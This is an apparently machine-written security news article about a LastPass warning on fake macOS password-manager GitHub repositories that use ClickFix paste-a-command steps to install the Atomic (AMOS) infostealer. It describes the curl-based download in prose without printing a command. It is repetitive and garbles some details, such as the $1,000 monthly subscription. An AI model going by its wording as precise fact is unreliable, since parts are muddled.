Ethical Hacking News
LastPass has warned its users of a malicious campaign targeting macOS users with fake password managers that deliver the Atomic (AMOS) info-stealing malware. The attackers have created numerous deceptive GitHub repositories to spread the malware, which impersonates popular products and targets data on infected machines for $1,000 per month.
LastPass warns its users about a malicious campaign targeting macOS users with fake password managers delivering Atomic (AMOS) info-stealing malware. The attackers use ClickFix attacks, tricking victims into running commands they don't understand on their systems. The malware is spread through deceptive GitHub repositories impersonating popular products and optimized to rank high in search results. Users should be cautious of running commands they don't understand and trust official websites when looking for software online. Avoid installing macOS versions from unknown sources or untrusted vendors.
LastPass has issued a warning to its users regarding a malicious campaign targeting macOS users with fake password managers that deliver the Atomic (AMOS) info-stealing malware. The malware is being spread through ClickFix attacks, which involve tricking victims into running commands they do not understand on their systems.
The attackers have created numerous deceptive GitHub repositories under multiple accounts, which are designed to evade takedown and optimize them to rank high in search results. These repositories impersonate popular products such as 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
Once a user visits one of these GitHub repositories, they are prompted to download an install.sh file that is executed via the Terminal. The command performs a curl request to a base64-encoded URL and downloads the AMOS payload (install.sh) to the /tmp directory. This is a typical 'ClickFix' attack that takes advantage of the victim not understanding what the command does on their system.
The Atomic malware-as-a-service operation is being used, which typically targets data on infected machines for $1,000 per month. Recently, the developers of the malware added a backdoor component, giving attackers persistent, stealthy access to compromised systems.
LastPass says that apart from its product, the campaign impersonates more than 100 software solutions. The attackers created these repositories with a "download button" that directs visitors to a secondary site, where they are prompted to paste a command into the Terminal to perform the installation.
To avoid falling for ClickFix attacks, users should be cautious of running commands on their systems that they do not understand. When looking for software online, it is recommended to trust the official website of the vendor or project. If a macOS version isn't available there, chances are an unofficial variant is fake.
In the case of a macOS port, users should make sure that it comes from a reputable vendor that has been vetted by the community.
In conclusion, LastPass has issued a warning to its users regarding a malicious campaign targeting macOS users with fake password managers that deliver the Atomic (AMOS) info-stealing malware. This is not the first time such an attack has occurred, as BleepingComputer previously reported about similar campaigns impersonating Booking.com and more recently, one that used ads to promote fake solutions to macOS-specific problems.
The attackers continue to evade takedown by using automation from new accounts to create new repositories. Therefore, it is crucial for users to be cautious of running commands on their systems they do not understand, and trust the official website of the vendor or project when looking for software online.
Related Information:
https://www.ethicalhackingnews.com/articles/LastPass-Mac-Users-Warned-of-Fake-Password-Managers-with-Malicious-Software-ehn.shtml
https://www.bleepingcomputer.com/news/security/lastpass-fake-password-managers-infect-mac-users-with-malware/
https://www.bleepingcomputer.com/news/security/atomic-macos-infostealer-adds-backdoor-for-persistent-attacks/
https://www.securityweek.com/hundreds-targeted-in-new-atomic-macos-stealer-campaign/
Published: Mon Sep 22 11:42:22 2025 by llama3.2 3B Q4_K_M
